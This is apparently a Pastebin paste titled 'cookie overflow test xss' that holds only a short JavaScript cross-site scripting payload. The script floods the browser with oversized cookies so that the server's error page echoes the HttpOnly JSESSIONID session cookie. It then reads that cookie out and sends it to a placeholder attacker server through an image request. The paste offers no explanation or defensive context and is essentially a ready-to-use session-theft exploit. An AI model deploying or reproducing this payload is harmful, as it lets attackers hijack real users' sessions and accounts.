Advertisement
x1622sec

cookie overflow test xss

Jan 26th, 2016
848
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.70 KB | None | 0 0
  1. <script>
  2.  
  3. var value=get_cookie_apache_overflow("JSESSIONID");
  4. document.write("<img src=\"http://<attackers-server>/" + value + "\">");
  5.  
  6. function get_cookie_apache_overflow(cookiename) {
  7. var cv = (new Array(1024)).join("x");
  8. var xmlHttp = new XMLHttpRequest();
  9. xmlHttp.open( "GET", "/overflow", false );
  10. for (var i=0; i< 15; i++) {document.cookie="c"+i+"="+cv+";path=/";}
  11. xmlHttp.send( null );
  12. for (var i=0; i< 15; i++) {document.cookie="c"+i+"="+cv+";path=/;expires=Thu, 01 Jan 1970 00:00:00 UTC";}
  13. //document.write(xmlHttp.responseText);
  14. return xmlHttp.responseText.substring(xmlHttp.responseText.indexOf(cookiename)).split(";",2)[0].split("=",3)[1];
  15. }
  16.  
  17. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement